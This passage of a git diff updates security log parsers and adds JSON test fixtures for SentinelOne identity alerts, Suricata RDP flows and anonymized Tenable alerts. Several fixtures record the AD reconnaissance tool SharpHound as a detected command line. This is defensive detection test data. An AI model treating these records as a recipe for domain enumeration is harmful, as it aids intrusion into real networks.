"product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\cmd.exe\"", + "executable": "c:\\windows\\system32\\cmd.exe", + "hash": { + "sha256": "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + }, + "name": "cmd.exe" + }, + "related": { + "hash": [ + "4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "0193534d-63c1-7497-b854-b883425af3f5", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_6.json b/SentinelOne/identity/tests/test_alert_6.json new file mode 100644 index 000000000..5b987ddc2 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_6.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-abf7-7457-8467-e3443470e6f3\", \"name\": \"AD Domain Computer Enumeration Detected\", \"description\": \"This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to dump all the computers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-abf7-7457-8467-e3443470e6f3", + "name": "AD Domain Computer Enumeration Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_7.json b/SentinelOne/identity/tests/test_alert_7.json new file mode 100644 index 000000000..6fc5195cb --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_7.json @@ -0,0 +1,47 @@ +{ + "input": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935347-b05a-7d28-a929-5294ee16628a\", \"name\": \"Domain Controller Discovery Detected\", \"description\": \"This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.\", \"detectedAt\": \"2024-11-22T09:45:51.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:51.000Z\", \"lastSeenAt\": \"2024-11-22T09:45:51.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:51Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when there is a query from an endpoint to find the domain controllers or AD Servers in the Active Directory Domain.", + "start": "2024-11-22T09:45:51Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:51Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "process": { + "command_line": "Sharphound.exe", + "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", + "hash": { + "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + }, + "name": "sharphound.exe" + }, + "related": { + "hash": [ + "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" + ] + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "ENUMERATION", + "confidenceLevel": "MALICIOUS", + "id": "01935347-b05a-7d28-a929-5294ee16628a", + "name": "Domain Controller Discovery Detected", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_8.json b/SentinelOne/identity/tests/test_alert_8.json new file mode 100644 index 000000000..384a41648 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_8.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935342-d073-7ed0-8c5e-2373fc013310\", \"name\": \"Default Admin Account Usage\", \"description\": \"This event is raised for default administrator account logon anywhere in the domain.\", \"detectedAt\": \"2024-11-22T09:45:07.655Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:45:07.655Z\", \"lastSeenAt\": \"2024-11-22T09:45:07.655Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:45:07.655000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised for default administrator account logon anywhere in the domain.", + "start": "2024-11-22T09:45:07.655000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:45:07.655000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935342-d073-7ed0-8c5e-2373fc013310", + "name": "Default Admin Account Usage", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_9.json b/SentinelOne/identity/tests/test_alert_9.json new file mode 100644 index 000000000..74ab3a7f3 --- /dev/null +++ b/SentinelOne/identity/tests/test_alert_9.json @@ -0,0 +1,34 @@ +{ + "input": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}" + }, + "expected": { + "message": "{\"id\": \"01935322-cc3a-76cc-890b-a1c2d1b815d4\", \"name\": \"Brute force attack - Mass Account Lockout\", \"description\": \"This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.\", \"detectedAt\": \"2024-11-22T09:10:09.467Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"UNKNOWN\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T09:10:09.467Z\", \"lastSeenAt\": \"2024-11-22T09:10:09.467Z\", \"process\": null, \"result\": null, \"storylineId\": null}", + "event": { + "category": "intrusion_detection", + "end": "2024-11-22T09:10:09.467000Z", + "kind": "alert", + "provider": "Identity", + "reason": "This event is raised when ADAssessor detects lockout of multiple accounts, which could be due to brute-force attempts or a password spray.", + "start": "2024-11-22T09:10:09.467000Z", + "type": "info" + }, + "@timestamp": "2024-11-22T09:10:09.467000Z", + "observer": { + "product": "Singularity Identity", + "vendor": "SentinelOne" + }, + "sentinelone": { + "identity": { + "attackSurfaces": [ + "IDENTITY" + ], + "classification": "UNKNOWN", + "confidenceLevel": "MALICIOUS", + "id": "01935322-cc3a-76cc-890b-a1c2d1b815d4", + "name": "Brute force attack - Mass Account Lockout", + "status": "NEW" + } + } + } +} \ No newline at end of file diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' @@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml @@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Suricata/suricata/_meta/smart-descriptions.json b/Suricata/suricata/_meta/smart-descriptions.json index fc89638e0..432cf533d 100644 --- a/Suricata/suricata/_meta/smart-descriptions.json +++ b/Suricata/suricata/_meta/smart-descriptions.json @@ -151,8 +151,7 @@ "value": "query" }, { - "field": "action.type", - "value": "dns" + "field": "dns.question.name" } ], "relationships": [ @@ -198,6 +197,22 @@ } ] }, + { + "value": "RDP traffic from {source.ip} to {destination.ip}", + "conditions": [ + { + "field": "action.type", + "value": "rdp" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "requested" + } + ] + }, { "value": "Traffic flow from {source.ip} with {user_agent.original} to {destination.ip} with {http.request.method} request to {url.original}", "conditions": [ diff --git a/Suricata/suricata/tests/rdp.json b/Suricata/suricata/tests/rdp.json new file mode 100644 index 000000000..131dd7025 --- /dev/null +++ b/Suricata/suricata/tests/rdp.json @@ -0,0 +1,57 @@ +{ + "input": { + "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}", + "sekoiaio": { + "intake": { + "dialect": "Suricata", + "dialect_uuid": "331fa58d-8cf9-454a-a87f-48a3dc07d4d3" + } + } + }, + "expected": { + "message": "{\"timestamp\":\"2024-11-29T15:08:06.239558+0000\",\"flow_id\":1822723333770346,\"in_iface\":\"eth0\",\"event_type\":\"rdp\",\"src_ip\":\"14.225.46.243\",\"src_port\":58953,\"dest_ip\":\"10.0.1.4\",\"dest_port\":3389,\"proto\":\"TCP\",\"community_id\":\"1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=\",\"rdp\":{\"tx_id\":2,\"event_type\":\"tls_handshake\",\"x509_serials\":[\"773dbe1ea6dc998444b4f9da1f188ba8\"]}}", + "event": { + "category": [ + "network" + ], + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-29T15:08:06.239558Z", + "action": { + "type": "rdp" + }, + "destination": { + "address": "10.0.1.4", + "ip": "10.0.1.4", + "port": 3389 + }, + "host": { + "ip": "14.225.46.243" + }, + "network": { + "community_id": "1:kyALzWxuJ/ruPpAqvO4KTLSsEaQ=", + "protocol": "TCP", + "transport": "TCP" + }, + "observer": { + "ingress": { + "interface": { + "name": "eth0" + } + } + }, + "related": { + "ip": [ + "10.0.1.4", + "14.225.46.243" + ] + }, + "source": { + "address": "14.225.46.243", + "ip": "14.225.46.243", + "port": 58953 + } + } +} \ No newline at end of file diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml @@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/Tenable/alsid/tests/alert_gpo_exec.json b/Tenable/alsid/tests/alert_gpo_exec.json index fd44a4363..f55ff40bf 100644 --- a/Tenable/alsid/tests/alert_gpo_exec.json +++ b/Tenable/alsid/tests/alert_gpo_exec.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"", "event": { "kind": "alert", "outcome": "success" @@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-GPO-EXEC-SANITY-UNKNOWN-CSE", "properties": { - "ADdevianceID": 2008125, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2008000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain", + "ADobject": "CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain", "AttributeName": "GpcMachineExtensionName", "CseGuid": "{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}", - "GpoName": "#URDOM-APP-RSAT-TEST", + "GpoName": "#TEST-APP-RSAT-TEST", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "79016668" + "eventID": "790160000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_obsolete_system.json b/Tenable/alsid/tests/alert_obsolete_system.json index 32e1efc05..69c282597 100644 --- a/Tenable/alsid/tests/alert_obsolete_system.json +++ b/Tenable/alsid/tests/alert_obsolete_system.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", "event": { "kind": "alert", "outcome": "success" @@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-SLEEPING-OBSOLETE-SYSTEMS", "properties": { - "ADdevianceID": 2007590, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2007000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=urdom,DC=ad,DC=domain", - "ComputerCn": "cnpsp16bd", + "ADobject": "CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=testDC,DC=ad,DC=domain", + "ComputerCn": "testComputerCN", "OperatingSystem": "Windows Server 2012 R2 Standard", "OperatingSystemVersion": "6.3 (9600)", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "78964369" + "eventID": "78964000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_pattern2.json b/Tenable/alsid/tests/alert_pattern2.json index 2364c0604..c514b9478 100644 --- a/Tenable/alsid/tests/alert_pattern2.json +++ b/Tenable/alsid/tests/alert_pattern2.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" }, "expected": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", "event": { "kind": "alert" }, @@ -13,13 +13,13 @@ "ADforestName": "foo.ad.com", "ADobject": "Suspicious DC Password Change", "alertID": 21, - "dc_ip": "10.17.92.40", - "dc_name": "HOSTNAME-040", + "dc_ip": "1.2.3.4", + "dc_name": "HOSTNAME-000", "eventID": "critical", "eventType": "Unknown", "field1": "Unknown", - "field2": "HOSTNAME-040", - "field3": "10.17.92.40", + "field2": "HOSTNAME-000", + "field3": "1.2.3.4", "password_renewal_duration": "30:04:30:05", "source_hostname": "Unknown", "source_ip": "Unknown", diff --git a/Tenable/alsid/tests/event_1.json b/Tenable/alsid/tests/event_1.json index 1f9418431..e12e5d53e 100644 --- a/Tenable/alsid/tests/event_1.json +++ b/Tenable/alsid/tests/event_1.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" 